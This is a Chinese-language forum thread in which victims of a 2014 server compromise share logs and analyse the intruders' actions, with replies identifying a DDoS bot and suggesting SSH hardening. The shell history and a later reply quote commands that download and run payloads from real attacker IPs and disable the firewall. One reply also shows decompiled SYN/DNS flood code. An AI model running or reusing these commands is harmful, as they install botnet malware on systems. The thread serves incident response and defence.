服务器被入侵，麻烦高手帮忙分析下

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

For Existing Member Sign In

Distributions

Ubuntu

Fedora

CentOS

中文资源站

网易开源镜像站

This topic created in 4312 days ago, the information mentioned may be changed or developed.

服务器被入侵，密码被改了，流量一下跑了很多，麻烦高手帮忙分析下，这位黑兄拿我服务器干嘛了
root@(none):~# ls
bulong conf.n fake.cfg ssh33 wget-log.1
bulong.1 dlcfg getsetup.hb wget-log

root@(none):~# history
1 uptime
2 ps -aux
3 exit
4 free -m
5 df -h
6 passwd
7 ps -ef
8 wget http://222.186.40.170:666/getsetup.hb
9 chmod +x getsetup.hb
10 ./getsetup.hb
11 chattr +i getsetup.hb
12 wget http://96.44.185.98:8080/ssh33
13 chmod +x ssh33
14 ./ssh33
15 chattr +i ssh33
16 wget http://23.228.102.152:1818/bulong
17 ps -ef
18 wget http://23.228.102.152:1818/bulong
19 wget http://222.186.40.170:666/bulong
20 chmod +x bulong
21 ./bulong
22 chattr +i bulong
23 ps -ef
24 ls
25 history

root@(none):/var/log# last
root pts/1 111.8.2.138 Mon Jul 7 04:22 still logged in
reboot system boot 3.15.3-x86_64-li Mon Jul 7 04:22 - 04:33 (00:10)
reboot system boot 3.15.3-x86_64-li Mon Jul 7 04:16 - 04:20 (00:04)
root pts/0 58.22.113.155 Sun Jul 6 16:42 - 16:46 (00:03)
root pts/1 58.22.113.155 Sun Jul 6 16:08 - 16:11 (00:03)
root pts/0 58.22.113.155 Sun Jul 6 16:05 - 16:11 (00:06)
root pts/0 27.158.25.16 Sun Jul 6 04:41 - 04:41 (00:00)
root pts/0 ns405606.ip-37-1 Sat Jul 5 11:07 - 11:07 (00:00)
root pts/0 119.39.233.73 Wed Jul 2 14:01 - 16:50 (02:49)
root pts/0 119.39.233.73 Wed Jul 2 13:58 - 13:59 (00:00)
reboot system boot 3.15.3-x86_64-li Wed Jul 2 13:57 - 23:14 (4+09:16)

Jul

wget

root@

23 replies 2014-07-11 01:10:06 +08:00

ihacku

Jul 7, 2014

http://news.drweb.com/?i=5801&c=5&lng=en&p=0

wzxjohn

Jul 7, 2014

wget http://96.44.185.98:8080/ssh33
这个文件没下载下来，撸主能否上传到百度盘看看。

wzxjohn

Jul 7, 2014

http://r.virscan.org/report/b191ce7b4ed3b5a21f0d18dc93b62d65
http://r.virscan.org/report/85589ce710b58d7d109e7a8069889d00
根据这两个来看这是被植入了DDoS服务程序。

evilangel

Jul 7, 2014 via iPad

@wzxjohn 从IP上看貌似也是国人干的。

avrillavigne

Jul 7, 2014

诺顿scep 报Backdoor.Piltabe

humiaozuzu

Jul 7, 2014

我有几台服务器也被入侵了，不过还好权限是 elasticsearch 结束掉进程就 OK，没有被替换文件，补了 ES 的 bug 就好。
然后看了下下载的文件都一样，也是被用作 DDOS 了

evilangel

Jul 7, 2014

@wzxjohn 上传到百度网盘了，地址http://pan.baidu.com/s/1pJ9atC3 另外怎么看出来这个是DDOS服务程序的？用猜的我这种最可能的是DDOS或者服务器口令自动破解程序之类的。

@humiaozuzu 居然遇到的都是一样的。但是想不通是怎么在这么快的时间内破解我的root密码的。

markmx

Jul 7, 2014

前几天我也被攻击了。是土耳其的攻击。慢慢的斗智斗勇，终于搞定了

markmx

Jul 7, 2014

密码扫描这个事情。最好还是加上判断。几次输入密码错误，封闭IP！

humiaozuzu

Jul 7, 2014

@evilangel 如果不是弱口令，一般是已有的服务的 0day，比如我遇到的就是 elasticsearch 的，如果你那个服务用的是 root 权限运行，就可以随意修改密码了

wzxjohn

Jul 7, 2014

@evilangel 那个查杀报告里不是写了么。。。

henices

Jul 7, 2014

int __cdecl AddTask(int a1)
{
int v1; // ebx@1
int v2; // ebx@2
int v4; // eax@6
int v5; // edi@6
int v6; // eax@7
int v7; // eax@11
int v8; // eax@13

pthread_mutex_lock(TaskLockMutex);
v1 = taskcount;
if ( (unsigned int)taskcount > 0x13 )
{
v2 = taskcount + 33554432;
goto LABEL_3;
}
if ( CheckTaskExist(a1 + 80) )
{
v2 = v1 + 536870912;
goto LABEL_3;
}
v4 = malloc(132);
v5 = v4;
if ( !v4 )
{
v2 = v1 + 134217728;
goto LABEL_3;
}
memcpy(v4, a1, 112);
v6 = *(_DWORD *)(v5 + 8);
if ( v6 & 1 )
{
v7 = HbCreateThread(SynFloodThread, v5, v5 + 112, 0, 1);
}
else
{
if ( !(v6 & 2) )
{
LABEL_9:
v2 = v1 + 67108864;
free(v5);
goto LABEL_3;
}
v7 = HbCreateThread(DnsFloodThread, v5, v5 + 112, 0, 1);
}
if ( v7 != 1 )
goto LABEL_9;
v8 = pMaskTask;
if ( pMaskTask )
{
*(_DWORD *)(v5 + 128) = 0;
*(_DWORD *)(v5 + 124) = v8;
*(_DWORD *)(v8 + 128) = v5;
pMaskTask = v5;
}
else
{
pMaskTask = v5;
*(_DWORD *)(v5 + 124) = 0;
*(_DWORD *)(v5 + 128) = 0;
}
__asm { lock add ds:taskcount, 1 }
v2 = taskcount + 268435456;
LABEL_3:
pthread_mutex_unlock(TaskLockMutex);
return v2;
}

evilangel

Jul 7, 2014

@markmx 厉害，膜拜了！看来后面是需要配置一下。

@humiaozuzu 我是刚装完的系统，什么软件都没装了然后才一天时间就密码被人改了登陆不上了。重置密码之后就发现目录下面有东西然后历史命令里多了这十几条命令。

@wzxjohn 嗯嗯，没太注意看，刚又看了下发现了。谢谢了！

@henices 牛！！！

davansy

Jul 7, 2014

@evilangel 呵呵，还改你的密码了，看似刚出道的黑客刷存在感的样子。

Owenjia

Jul 8, 2014 via Android

还是禁止密码登录比较好吧～～

jalen

Jul 8, 2014

@Owenjia 禁止密码登录？？还有啥其他方式？

Owenjia

Jul 8, 2014

@jalen 你是用的 ssh 吧？可以用密钥登陆啊～～可以看下这里 http://en.wikipedia.org/wiki/Ssh-keygen

netpro

Jul 8, 2014

@jalen 证书认证

oldcai

PRO

Jul 9, 2014

我也碰到同样的事情了，elasticsearch漏洞导致远程执行。
前几天被服务商告知在发出ddos攻击，我还不太相信，因为我一直都只用公私钥，不用密码登陆。

从log里面看来，一直在执行下面的东西。
/etc/init.d/iptables stop
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
chmod 0775 /usr/bin/rm
chmod 0775 /usr/bin/wget
mkdir /etc/plngius
killall .Linux_time_y_2014
rm -r -f /etc/plngius/.Linux_time_y_2014
wget -O /etc/plngius/.Linux_time_y_2014 http://119.1.109.43:4443/txma
chmod 0755 /etc/plngius/.Linux_time_y_2014
nohup /etc/plngius/.Linux_time_y_2014 > /dev/null 2>&1 &
killall .Linux_time_y_2015
rm -r -f /tmp/.Linux_time_y_2015
wget -O /tmp/.Linux_time_y_2015 http://119.1.109.43:4443/xudp
chmod 0755 /tmp/.Linux_time_y_2015
nohup /tmp/.Linux_time_y_2015> /dev/null 2>&1 &
exit

pythoner

Jul 9, 2014

@jalen

1，修改ssh的默认端口
2，禁止root账号登陆
3，新建一个账号(不要用admin之类容易猜到的账号，并设置一个复杂的密码)并让其可以sudo su成root
4，用DenyHosts防止暴力破解将对方尝试破解的ip拒绝掉

我贴一个日志：

tail -n 1000 auth.log |grep 'Failed password for root '
Jul 9 20:26:02 s1 sshd[30294]: Failed password for root from 61.128.110.39 port 45014 ssh2
Jul 9 20:26:06 s1 sshd[30311]: Failed password for root from 61.128.110.39 port 46366 ssh2
Jul 9 20:26:09 s1 sshd[30459]: Failed password for root from 61.128.110.39 port 47481 ssh2

从上面的日志可以看到对方在尝试不同的端口号，由于我禁止了root账号登陆，所以就算端口号猜对了也会失败，失败3次之后 61.128.110.39就自动被防火墙拒绝掉（/etc/hosts.deny ）

tonyluj

Jul 10, 2014

千万不要用root登录，用个普通权限的user + sudo即可，文件权限也不要用chmod 777
SSH直接禁止ROOT + 改端口 + 证书登录

并装上fail2ban，防止别人暴力破解

songday

Jul 10, 2014

我刚刚也是被通知，说有两个机器被用作 DDOS 攻击了
刚好上面也跑了 ES，那个 ES 补丁是在官网上的吗？

songday

Jul 11, 2014

@humiaozuzu 你好，能告知一下 ES 的补丁是在哪里吗？
我在官网上没有找到 :(